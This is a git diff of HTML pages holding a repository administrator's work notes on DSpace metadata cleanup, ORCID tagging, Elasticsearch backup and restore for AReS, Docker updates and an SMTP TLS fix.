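escaped = escape(raw_value)
parsed = ET.fromstring(f"<stored-value>{escaped}</stored-value>")

print(unescaped_parses)          # False
print(escaped)                   # EXAMPLE&amp;WA_EU-IFAD
print(parsed.text == raw_value)  # True
```

The round trip in the last line is the point of the check: the parser hands back the original value, so the escaped form should behave the same as the intended tag wherever the XML is read.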

                                                                                                                                                                                                                                                                                                                                                                                                    2021-05-18

                                                                                                                                                                                                                                                                                                                                                                                                    @@ -461,34 +461,34 @@ line 3659 column 23 - Warning: unescaped & or unknown entity "&WA_EU
                                                                                                                                                                                                                                                                                                                                                                                                  • Paola from the Alliance emailed me some new ORCID identifiers to add to CGSpace
                                                                                                                                                                                                                                                                                                                                                                                                  • I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using resolve-orcids.py:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-05-18-combined.txt
                                                                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-05-18-combined.txt
                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
                                                                                                                                                                                                                                                                                                                                                                                                    +
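For readers who prefer to follow the `grep -oE ... | sort | uniq` step in Python, here is a minimal sketch of the same idea: pull every ORCID-shaped token out of the combined text, drop duplicates, and sort. The `extract_orcids` helper and the two sample strings are assumptions for illustration; the real inputs are the controlled vocabulary file and `/tmp/new`, whose contents are not shown here.

```python
import re

# Same pattern as the grep command: four groups of four characters.
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def extract_orcids(*texts: str) -> list[str]:
    """Collect unique ORCID iDs from all inputs, sorted like `sort | uniq`."""
    found = set()
    for text in texts:
        found.update(ORCID_PATTERN.findall(text))
    return sorted(found)


# Illustrative stand-ins for the existing vocabulary and the new identifiers.
existing = (
    "Sergio Alejandro Urioste Daza: 0000-0002-3208-032X\n"
    "James Giles: 0000-0003-1899-9206\n"
)
new = (
    "James Giles: 0000-0003-1899-9206\n"
    "Alice Simbare: 0000-0003-2389-0969\n"
)

combined = extract_orcids(existing, new)
print("\n".join(combined))
```

Note that the pattern is deliberately loose: it accepts letters in every position, whereas a real ORCID iD only allows an `X` as the final check character. That is fine for harvesting, since the identifiers are resolved against ORCID in the next step anyway.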
                                                                                                                                                                                                                                                                                                                                                                                                    • I sorted the names and added the XML formatting in vim, then ran it through tidy:
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                    $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-identifier.xml
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-identifier.xml
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      • Tag fifty-five items from the Alliance’s new authors with ORCID iDs using add-orcid-identifiers-csv.py:
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                      $ cat 2021-05-18-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                      -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                      -"Urioste Daza, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                      -"Urioste, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                      -"Villegas, Daniel",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                      -"Villegas, Daniel M.",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                      -"Giles, James",James Giles: 0000-0003-1899-9206
                                                                                                                                                                                                                                                                                                                                                                                                      -"Simbare,  Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                      -"Simbare, Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                      -"Simbare, A.",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                      -"Dita Rodriguez, Miguel",Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
                                                                                                                                                                                                                                                                                                                                                                                                      -"Templer, Noel",Noel Templer: 0000-0002-3201-9043
                                                                                                                                                                                                                                                                                                                                                                                                      -"Jalonen, R.",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                      -"Jalonen, Riina",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                      -"Izquierdo, Paulo",Paulo Izquierdo: 0000-0002-2153-0655
                                                                                                                                                                                                                                                                                                                                                                                                      -"Reyes, Byron",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                      -"Reyes, Byron A.",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        $ cat 2021-05-18-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                        +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                        +"Urioste Daza, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                        +"Urioste, Sergio",Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
                                                                                                                                                                                                                                                                                                                                                                                                        +"Villegas, Daniel",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                        +"Villegas, Daniel M.",Daniel M. Villegas: 0000-0001-6801-3332
                                                                                                                                                                                                                                                                                                                                                                                                        +"Giles, James",James Giles: 0000-0003-1899-9206
                                                                                                                                                                                                                                                                                                                                                                                                        +"Simbare,  Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                        +"Simbare, Alice",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                        +"Simbare, A.",Alice Simbare: 0000-0003-2389-0969
                                                                                                                                                                                                                                                                                                                                                                                                        +"Dita Rodriguez, Miguel",Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
                                                                                                                                                                                                                                                                                                                                                                                                        +"Templer, Noel",Noel Templer: 0000-0002-3201-9043
                                                                                                                                                                                                                                                                                                                                                                                                        +"Jalonen, R.",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                        +"Jalonen, Riina",Riina Jalonen: 0000-0003-1669-9138
                                                                                                                                                                                                                                                                                                                                                                                                        +"Izquierdo, Paulo",Paulo Izquierdo: 0000-0002-2153-0655
                                                                                                                                                                                                                                                                                                                                                                                                        +"Reyes, Byron",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                        +"Reyes, Byron A.",Byron Reyes: 0000-0003-2672-9636
                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        • I deployed the latest 6_x-prod branch on CGSpace, ran all system updates, and rebooted the server
                                                                                                                                                                                                                                                                                                                                                                                                          • This included the IWMI changes, so I also migrated the cg.subject.iwmi metadata to dcterms.subject and deleted the subject term
@@ -504,9 +504,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspa
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                        dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                        -UPDATE 47405
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
                                                                                                                                                                                                                                                                                                                                                                                                          +UPDATE 47405
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          • That’s interesting because we lowercased them all a few months ago, so these must all be new… wow
                                                                                                                                                                                                                                                                                                                                                                                                            • We have 405,000 total AGROVOC terms, with 20,600 of them being unique
@@ -518,12 +518,12 @@ UPDATE 47405
                                                                                                                                                                                                                                                                                                                                                                                                              • Export the top 5,000 AGROVOC terms to validate them:
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                              -COPY 5000
                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvcut -c 1 /tmp/2021-05-20-agrovoc.csv| sed 1d > /tmp/2021-05-20-agrovoc.txt
                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c "number of matches" -r '^0$' /tmp/2021-05-20-agrovoc-results.csv > /tmp/2021-05-20-agrovoc-rejected.csv
                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY text_value ORDER BY count DESC LIMIT 5000) to /tmp/2021-05-20-agrovoc.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                +COPY 5000
                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c 1 /tmp/2021-05-20-agrovoc.csv| sed 1d > /tmp/2021-05-20-agrovoc.txt
                                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/agrovoc-lookup.py -i /tmp/2021-05-20-agrovoc.txt -o /tmp/2021-05-20-agrovoc-results.csv
                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c "number of matches" -r '^0$' /tmp/2021-05-20-agrovoc-results.csv > /tmp/2021-05-20-agrovoc-rejected.csv
                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                • Meeting with Medha and Pythagoras about the FAIR Workflow tool
                                                                                                                                                                                                                                                                                                                                                                                                                  • Discussed the need for such a tool, other tools being developed, etc
@@ -545,54 +545,54 @@ $ csvgrep -c "number of matches" -r <
                                                                                                                                                                                                                                                                                                                                                                                                                    • Add ORCID identifiers for missing ILRI authors and tag 550 others based on a few authors I noticed that were missing them:
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                    $ cat 2021-05-24-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                    -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Patel, Ekta","Ekta Patel: 0000-0001-9400-6988"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Tadelle, D.","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Steinaa, Lucilla","Lucilla Steinaa: 0000-0003-3691-3971"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Rao, Idupulapati M.","Idupulapati M. Rao: 0000-0002-8381-9358"
                                                                                                                                                                                                                                                                                                                                                                                                                    -"Cardoso Arango, Juan Andrés","Juan Andrés Cardoso Arango: 0000-0002-0252-4655"
                                                                                                                                                                                                                                                                                                                                                                                                                    -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat 2021-05-24-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                                                                                      +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Patel, Ekta","Ekta Patel: 0000-0001-9400-6988"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Dessie, Tadelle","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Tadelle, D.","Tadelle Dessie: 0000-0002-1630-0417"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Dione, Michel M.","Michel Dione: 0000-0001-7812-5776"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Kiara, Henry K.","Henry Kiara: 0000-0001-9578-1636"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Naessens, Jan","Jan Naessens: 0000-0002-7075-9915"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Steinaa, Lucilla","Lucilla Steinaa: 0000-0003-3691-3971"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Wieland, Barbara","Barbara Wieland: 0000-0003-4020-9186"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Rao, Idupulapati M.","Idupulapati M. Rao: 0000-0002-8381-9358"
                                                                                                                                                                                                                                                                                                                                                                                                                      +"Cardoso Arango, Juan Andrés","Juan Andrés Cardoso Arango: 0000-0002-0252-4655"
                                                                                                                                                                                                                                                                                                                                                                                                                      +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-05-24-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                      • A few days ago I took a backup of the Elasticsearch indexes on AReS using elasticdump:
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                      $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                      -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                        +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                        +
• The indexes look OK so I started a harvest on AReS

                                                                                                                                                                                                                                                                                                                                                                                                                        2021-05-25

• The AReS harvest got messed up somehow, as I see the number of items in the indexes is the same as before the harvest:
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                        $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items                                                
                                                                                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
                                                                                                                                                                                                                                                                                                                                                                                                                        -yellow open openrxv-items-final      soEzAnp3TDClIGZbmVyEIw 1 1    953      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                          $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items                                                
                                                                                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-temp       o3ijJLcyTtGMOPeWpAJiVA 1 1 104373 106455 491.5mb 491.5mb
                                                                                                                                                                                                                                                                                                                                                                                                                          +yellow open openrxv-items-final      soEzAnp3TDClIGZbmVyEIw 1 1    953      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                                                                                                                          +
• Update all Docker images on the AReS server (linode20):
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                          -$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                          -$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                                            +$ docker-compose -f docker/docker-compose.yml down
                                                                                                                                                                                                                                                                                                                                                                                                                            +$ docker-compose -f docker/docker-compose.yml build
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            • Then run all system updates on the server and reboot it
                                                                                                                                                                                                                                                                                                                                                                                                                            • Oh crap, I deleted everything on AReS and restored the backup and the total items are now 104317… so it was actually correct before!
                                                                                                                                                                                                                                                                                                                                                                                                                            • For reference, this is how I re-created everything:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                            -curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                                                            -elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                            -elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                              +curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                                                                                                              +elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                                                                                                              +elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-final --type=data --limit=1000
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • I will just start a new harvest… sigh
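The alias step in the commands above is the easiest one to mistype by hand, so here is a minimal sketch that builds the `_aliases` request body from an index name and an alias name. The function name `alias_action` is hypothetical and not part of OpenRXV or Elasticsearch; the index and alias names are the ones already used above.

```shell
#!/bin/sh
# Hypothetical helper: print the JSON body for an Elasticsearch _aliases
# "add" action. Assumes the index and alias names contain no characters
# that need JSON escaping (true for the names used in these notes).
alias_action() {
    printf '{"actions":[{"add":{"index":"%s","alias":"%s"}}]}\n' "$1" "$2"
}

# Usage (commented out because it needs Elasticsearch on localhost:9200):
# curl -s -X POST 'http://localhost:9200/_aliases' \
#     -H 'Content-Type: application/json' \
#     -d "$(alias_action openrxv-items-final openrxv-items)"
```

Generating the body this way keeps the index and alias names in one place if the same sequence has to be repeated after another failed harvest.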

                                                                                                                                                                                                                                                                                                                                                                                                                              2021-05-26

                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -605,8 +605,8 @@ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhos
                                                                                                                                                                                                                                                                                                                                                                                                                            • Looking in the DSpace log for this morning I see a big hole in the logs at that time (UTC+2 server time):
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            2021-05-26 02:17:52,808 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: '10568/70659: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                            -2021-05-26 02:17:52,853 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: '10568/66761: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                            2021-05-26 02:17:52,808 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/70659 with status: 2. Result: '10568/70659: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-05-26 02:17:52,853 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/66761 with status: 2. Result: '10568/66761: item has country codes, skipping'
                                                                                                                                                                                                                                                                                                                                                                                                                             2021-05-26 03:00:05,772 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.spidersfile:null
                                                                                                                                                                                                                                                                                                                                                                                                                             2021-05-26 03:00:05,773 INFO  org.dspace.statistics.SolrLoggerServiceImpl @ solr-statistics.server:http://localhost:8081/solr/statistics
                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                              @@ -638,18 +638,18 @@ May 26, 02:57 UTC
                                                                                                                                                                                                                                                                                                                                                                                                                            • And indeed the email seems to be broken:
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            $ dspace test-email
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            -About to send test email:
                                                                                                                                                                                                                                                                                                                                                                                                                            - - To: fuuuuuu
                                                                                                                                                                                                                                                                                                                                                                                                                            - - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                                                                                                                            - - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            -Error sending email:
                                                                                                                                                                                                                                                                                                                                                                                                                            - - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                            -Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              $ dspace test-email
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +About to send test email:
                                                                                                                                                                                                                                                                                                                                                                                                                              + - To: fuuuuuu
                                                                                                                                                                                                                                                                                                                                                                                                                              + - Subject: DSpace test email
                                                                                                                                                                                                                                                                                                                                                                                                                              + - Server: smtp.office365.com
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +Error sending email:
                                                                                                                                                                                                                                                                                                                                                                                                                              + - Error: javax.mail.SendFailedException: Send failure (javax.mail.MessagingException: Could not convert socket to TLS (javax.net.ssl.SSLHandshakeException: No appropriate protocol (protocol is disabled or cipher suites are inappropriate)))
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              +Please see the DSpace documentation for assistance.
                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                              • I saw a recent thread on the dspace-tech mailing list about this that makes me wonder if Microsoft changed something on Office 365
                                                                                                                                                                                                                                                                                                                                                                                                                                • I added mail.smtp.ssl.protocols=TLSv1.2 to the mail.extraproperties in dspace.cfg and the test email sent successfully
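A quick way to confirm the setting is present before re-running `dspace test-email` is to grep the config file. This is only a sketch: the function name `has_tls12` is hypothetical, the path in the usage line is a placeholder, and it assumes `mail.extraproperties` is written on a single line.

```shell
#!/bin/sh
# Hypothetical check: succeed if the given dspace.cfg has a single-line
# mail.extraproperties entry that includes mail.smtp.ssl.protocols=TLSv1.2.
has_tls12() {
    grep -Eq '^[[:space:]]*mail\.extraproperties[[:space:]]*=.*mail\.smtp\.ssl\.protocols=TLSv1\.2' "$1"
}

# Usage: has_tls12 /path/to/dspace.cfg && echo "TLSv1.2 is pinned"
```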
diff --git a/docs/2021-06/index.html b/docs/2021-06/index.html
index fa96c5448..a216114dc 100644
--- a/docs/2021-06/index.html
+++ b/docs/2021-06/index.html
@@ -36,7 +36,7 @@ I simply started it and AReS was running again:
 "/>
-
+
@@ -132,8 +132,8 @@ I simply started it and AReS was running again:
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ docker-compose -f docker/docker-compose.yml start angular_nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ docker-compose -f docker/docker-compose.yml start angular_nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                • Margarita from CCAFS emailed me to say that workflow alerts haven’t been working lately
                                                                                                                                                                                                                                                                                                                                                                                                                                  • I guess this is related to the SMTP issues last week
@@ -162,14 +162,14 @@ I simply started it and AReS was running again:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • The Elasticsearch indexes are messed up so I dumped and re-created them correctly:
                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -XPUT 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -XPUT 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                                                                                                                    -curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
